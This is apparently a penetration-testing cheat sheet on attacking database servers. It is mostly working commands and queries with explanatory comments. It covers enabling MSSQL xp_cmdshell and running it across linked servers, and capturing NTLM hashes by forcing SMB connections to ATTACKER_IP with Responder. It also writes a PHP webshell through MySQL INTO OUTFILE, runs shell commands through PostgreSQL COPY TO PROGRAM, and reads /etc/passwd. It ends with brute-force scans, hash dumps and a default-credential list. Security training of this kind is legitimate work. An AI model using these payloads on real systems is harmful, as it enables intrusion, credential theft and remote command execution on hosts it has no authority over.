Database Enumeration
Databases often contain sensitive data and may provide paths to privilege escalation, especially MSSQL with its tight Active Directory integration.
flowchart TD
A[Database Enum] --> B[MSSQL]
A --> C[MySQL]
A --> D[PostgreSQL]
A --> E[Oracle]
B --> B1[SPN Discovery]
B --> B2[xp_cmdshell]
B --> B3[Linked Servers]
C --> C1[UDF Injection]
D --> D1[Large Objects]
style A fill:#00ff00,stroke:#000,color:#000
style B2 fill:#a855f7,stroke:#000,color:#000
style B3 fill:#a855f7,stroke:#000,color:#000
Discovery
Port Scanning
bash
# Database ports
# Service/version detection (-sV) against the common database listener ports listed below.
# TARGET is a placeholder for the host or range being scanned.
# NOTE(review): 1434 is a UDP listener per the list below, but -p with no "U:" prefix scans TCP only - confirm intent.
nmap -p 1433,1434,3306,5432,1521,27017,6379,9200 -sV TARGET
# Common database ports:
# 1433/tcp - MSSQL
# 1434/udp - MSSQL Browser
# 3306/tcp - MySQL/MariaDB
# 5432/tcp - PostgreSQL
# 1521/tcp - Oracle
# 27017/tcp - MongoDB
# 6379/tcp - Redis
# 9200/tcp - Elasticsearch
# Full database scan
# NOTE(review): the --script patterns on the next line are unquoted shell globs; quote them so the shell does not expand them against local file names.
nmap -sV -sC --script=*-sql*,*-mysql*,*-pgsql*,*-oracle* TARGET
SPN Discovery (MSSQL)
bash
# Find MSSQL servers via SPN
# Impacket: list the domain's SPNs and keep only the MSSQL entries.
# corp.local/user:password and DC_IP are placeholders.
GetUserSPNs.py corp.local/user:password -dc-ip DC_IP | grep MSSQL
# LDAP query
# Same SPN lookup over plain LDAP; -W prompts for the bind password instead of taking it on the command line.
ldapsearch -x -H ldap://DC_IP -D "user@corp.local" -W \
-b "DC=corp,DC=local" "(servicePrincipalName=*MSSQL*)" sAMAccountName servicePrincipalName
# PowerView
# Domain users that carry an SPN, filtered client-side to MSSQL.
Get-DomainUser -SPN | Where-Object {$_.servicePrincipalName -like '*MSSQL*'}
# CrackMapExec
crackmapexec mssql 10.0.0.0/24 -u user -p pass
MSSQL Enumeration
Tip
MSSQL integrates with AD authentication. Try Windows authentication with domain credentials.
Basic Connection
bash
# Impacket mssqlclient
# SQL_SERVER is a placeholder; -windows-auth switches from a SQL login to Windows (domain) authentication.
mssqlclient.py corp.local/user:password@SQL_SERVER
mssqlclient.py corp.local/user:password@SQL_SERVER -windows-auth
# sqsh
# -U sa is a SQL login; corp.local\user is a domain account.
# NOTE(review): a password passed via -P is visible in process listings and shell history.
sqsh -S SQL_SERVER -U sa -P password
sqsh -S SQL_SERVER -U corp.local\user -P password
# CrackMapExec
crackmapexec mssql SQL_SERVER -u user -p pass -d corp.local
# Test local auth
# --local-auth forces a SQL login instead of domain authentication.
crackmapexec mssql SQL_SERVER -u sa -p 'password' --local-auth
Database Enumeration
sql
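-- Server info
-- @@version and @@servername identify the instance; DB_NAME() is the current database.
SELECT @@version;
SELECT @@servername;
SELECT DB_NAME();
-- CURRENT_USER is the database user; SYSTEM_USER is the login the session connected with.
SELECT CURRENT_USER;
SELECT SYSTEM_USER;
-- List databases
SELECT name FROM master.sys.databases;
-- List tables in the current database (explicit columns instead of SELECT *)
SELECT TABLE_CATALOG, TABLE_SCHEMA, TABLE_NAME, TABLE_TYPE
FROM INFORMATION_SCHEMA.TABLES;
-- List columns of one table ('users' is a placeholder table name)
SELECT TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME, DATA_TYPE, IS_NULLABLE
FROM INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_NAME = 'users';
-- Find interesting data: table names containing a keyword
SELECT name FROM sys.tables WHERE name LIKE '%user%';
SELECT name FROM sys.tables WHERE name LIKE '%pass%';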
SELECT name FROM sys.tables WHERE name LIKE '%credit%';
Privilege Checking
sql
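-- Check if sysadmin
-- IS_SRVROLEMEMBER returns 1 when the current login is a member of the role, 0 when not,
-- and NULL when the role name is not valid.
SELECT IS_SRVROLEMEMBER('sysadmin');
SELECT IS_SRVROLEMEMBER('serveradmin');
SELECT IS_SRVROLEMEMBER('dbcreator');
-- Server role memberships for ALL logins (not only the current one); filter on member_name to narrow.
-- Both columns were previously returned as "name"; aliases make the output readable.
SELECT
    dp.name AS member_name,
    sp.name AS role_name
FROM sys.server_principals AS sp
INNER JOIN sys.server_role_members AS srm
    ON sp.principal_id = srm.role_principal_id
INNER JOIN sys.server_principals AS dp
    ON srm.member_principal_id = dp.principal_id;
-- Impersonation: logins recorded as grantor of an IMPERSONATE permission
-- (the grant may belong to any grantee, not necessarily the current login).
-- NOTE(review): this joins on grantor_principal_id; if results look off, cross-check
-- against major_id with class = 101 (the server principal the permission is on).
SELECT DISTINCT grantor.name AS impersonable_login
FROM sys.server_permissions AS perm
INNER JOIN sys.server_principals AS grantor
    ON perm.grantor_principal_id = grantor.principal_id
WHERE perm.permission_name = 'IMPERSONATE';
-- Impersonate user
-- Switches the session's execution context to the named login; REVERT restores the original context.
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER;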
REVERT;
xp_cmdshell
Warning
xp_cmdshell allows OS command execution on the database host; enabling and using it requires sysadmin privileges.
sql
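-- Check xp_cmdshell status (value_in_use = 1 means it is currently enabled)
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';
-- Enable xp_cmdshell (requires sysadmin)
-- Both calls change persistent server configuration; 'show advanced options' must be on before
-- 'xp_cmdshell' can be set.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
-- Execute commands (they run in the OS context of the SQL Server service account, unless a proxy account is configured)
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'hostname';
EXEC xp_cmdshell 'ipconfig';
-- Disable again afterwards: xp_cmdshell is off by default and should stay off when not needed.
EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;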
-- Impacket
-- mssqlclient's built-in helper; enable_xp_cmdshell presumably issues the same sp_configure/RECONFIGURE pair shown above.
mssqlclient.py user:password@SQL_SERVER -windows-auth
SQL> enable_xp_cmdshell
SQL> xp_cmdshell whoami
Linked Servers
sql
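-- List linked servers
EXEC sp_linkedservers;
-- sys.servers also contains the local instance (server_id 0); is_linked marks linked-server entries.
-- Explicit columns instead of SELECT *.
SELECT name, product, provider, data_source, is_linked
FROM sys.servers;
-- Test linked server connection (LINKEDSERVER is a placeholder)
EXEC sp_testlinkedserver 'LINKEDSERVER';
-- Query linked server: the quoted statement is executed on the remote instance
SELECT * FROM OPENQUERY(LINKEDSERVER, 'SELECT @@version');
-- Execute on linked server (runs under the login mapping configured for the link - presumably; verify on the remote side)
EXEC ('xp_cmdshell ''whoami''') AT [LINKEDSERVER];
-- Recursive links (double hop)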
SELECT * FROM OPENQUERY("SERVER1", 'SELECT * FROM OPENQUERY("SERVER2", ''SELECT @@version'')');
Hash Capture
sql
-- Capture hash via xp_dirtree (requires SMB listener)
-- xp_dirtree is handed a UNC path, so the SQL Server host itself opens an SMB connection
-- to ATTACKER_IP (placeholder) and authenticates to it.
-- Defender note: a database server initiating outbound SMB to an arbitrary share is the observable here.
EXEC xp_dirtree '\\ATTACKER_IP\share';
-- xp_fileexist
-- Same outbound connection, triggered through a file-existence check instead.
EXEC xp_fileexist '\\ATTACKER_IP\share\file';
-- On attacker: Responder or Impacket smbserver
-- -I selects the interface to listen on.
responder -I eth0
impacket-smbserver share . -smb2support
MySQL Enumeration
Basic Connection
bash
# Connect
# Interactive login; -p with no value prompts for the password.
mysql -h TARGET -u root -p
# Password attached directly to -p (no space); it is then visible in process listings and shell history.
mysql -h TARGET -u user -ppassword
# CrackMapExec (if supported)
# Or use Hydra for bruteforce
hydra -l root -P passwords.txt TARGET mysql
Database Enumeration
sql
-- Version info (two spellings of the same value)
SELECT @@VERSION;
SELECT VERSION();
-- Current user: USER() is the account the client supplied,
-- CURRENT_USER() the account the server actually authenticated as.
SELECT USER();
SELECT CURRENT_USER();
-- List databases (SHOW SCHEMAS is a synonym of SHOW DATABASES)
SHOW SCHEMAS;
-- List tables
USE database_name;
SHOW TABLES;
-- Table structure (DESCRIBE is shorthand for SHOW COLUMNS FROM)
SHOW COLUMNS FROM table_name;
-- Privileges of the current account (same as a bare SHOW GRANTS), then of an explicit account
SHOW GRANTS FOR CURRENT_USER();
SHOW GRANTS FOR 'user'@'host';
User Credentials
sql
-- MySQL 5.7+
-- authentication_string holds the stored credential hash for each account.
SELECT Host, User, authentication_string FROM mysql.user;
-- MySQL 5.6 and earlier
-- Older releases kept the hash in the Password column instead.
SELECT Host, User, Password FROM mysql.user;
-- All user privileges
SELECT * FROM information_schema.user_privileges;
File Operations
sql
-- Read files (requires FILE privilege)
-- LOAD_FILE returns NULL rather than an error when the file is missing, unreadable by the
-- server process, or outside secure_file_priv, so a NULL result is inconclusive.
SELECT LOAD_FILE('/etc/passwd');
-- Write files (also gated by FILE and secure_file_priv; the server process must be able to write the path)
SELECT 'test' INTO OUTFILE '/tmp/test.txt';
-- Webshell (if web directory writable)
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
PostgreSQL Enumeration
Basic Connection
bash
# Connect
# psql prompts for a password when the server requires one.
psql -h TARGET -U postgres
psql -h TARGET -U user -d database
# With password
# PGPASSWORD puts the credential in the process environment; the psql documentation recommends ~/.pgpass instead.
PGPASSWORD='password' psql -h TARGET -U postgres
Database Enumeration
sql
-- Version
SELECT VERSION();
-- Current user (SQL-standard forms, no parentheses)
SELECT CURRENT_USER;
SELECT SESSION_USER;
-- List databases: psql shortcut, then the catalog query behind it
\list
SELECT datname FROM pg_catalog.pg_database;
-- List tables: psql shortcut, then the equivalent catalog query restricted to the public schema
\dt
SELECT tablename FROM pg_catalog.pg_tables WHERE schemaname = 'public';
-- List users: psql shortcut, then the catalog view
\du
SELECT usename FROM pg_catalog.pg_user;
-- User privileges
SELECT * FROM information_schema.role_table_grants;
Command Execution
sql
-- Check if superuser
-- Returns the text 'on' or 'off'.
SELECT current_setting('is_superuser');
-- COPY command (requires superuser)
-- COPY ... TO PROGRAM hands the string to the shell of the database server process, on the database host.
COPY (SELECT '') TO PROGRAM 'id';
COPY (SELECT '') TO PROGRAM 'whoami > /tmp/whoami.txt';
-- Read file
-- COPY FROM reads the server-side file system (the database host, not the client);
-- with the default text format each line of the file becomes one row of tmp.
CREATE TABLE tmp(data text);
COPY tmp FROM '/etc/passwd';
SELECT * FROM tmp;
-- Large objects
-- NOTE(review): 12345 is a hard-coded OID; lo_import fails if that OID is already in use - pick a free one or omit it.
SELECT lo_import('/etc/passwd', 12345);
\lo_export 12345 /tmp/passwd.txt
Nmap Scripts
bash
# MSSQL
# Several of these scripts are active, not passive: ms-sql-empty-password and ms-sql-brute-style scripts attempt logins,
# ms-sql-xp-cmdshell runs a command and ms-sql-dump-hashes reads credential hashes (both need sufficient rights).
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes -p 1433 TARGET
# MySQL
# mysql-brute and mysql-empty-password attempt logins against the service.
nmap --script mysql-info,mysql-enum,mysql-empty-password,mysql-brute,mysql-databases,mysql-users,mysql-variables -p 3306 TARGET
# PostgreSQL
# pgsql-brute attempts logins against the service.
nmap --script pgsql-brute -p 5432 TARGET
# Oracle
# oracle-sid-brute guesses SIDs; oracle-brute attempts logins.
nmap --script oracle-sid-brute,oracle-brute -p 1521 TARGET
# MongoDB
nmap --script mongodb-info,mongodb-databases,mongodb-brute -p 27017 TARGET
CrackMapExec MSSQL
bash
# Authentication test
# TARGET, user/pass and corp.local are placeholders; -d sets the domain for Windows authentication.
crackmapexec mssql TARGET -u user -p pass -d corp.local
# Execute query
# -q runs a T-SQL statement and prints its result.
crackmapexec mssql TARGET -u user -p pass -d corp.local -q "SELECT @@version"
# Execute command
# -x runs an OS command on the SQL Server host (presumably through xp_cmdshell, so sysadmin-level rights are needed).
crackmapexec mssql TARGET -u user -p pass -d corp.local -x "whoami"
# PowerShell command
# -X runs the argument through PowerShell rather than cmd.
crackmapexec mssql TARGET -u user -p pass -d corp.local -X "Get-Process"
# Get hashes (requires privileges)
crackmapexec mssql TARGET -u user -p pass -d corp.local --get-hash
Default Credentials
text
# MSSQL
sa:sa
sa:password
sa:Password123
sa:(blank)
# MySQL
root:(blank)
root:root
root:mysql
root:password
# PostgreSQL
postgres:(blank)
postgres:postgres
postgres:password
# Oracle
scott:tiger
sys:change_on_install
system:manager
# MongoDB
(no auth by default)
admin:admin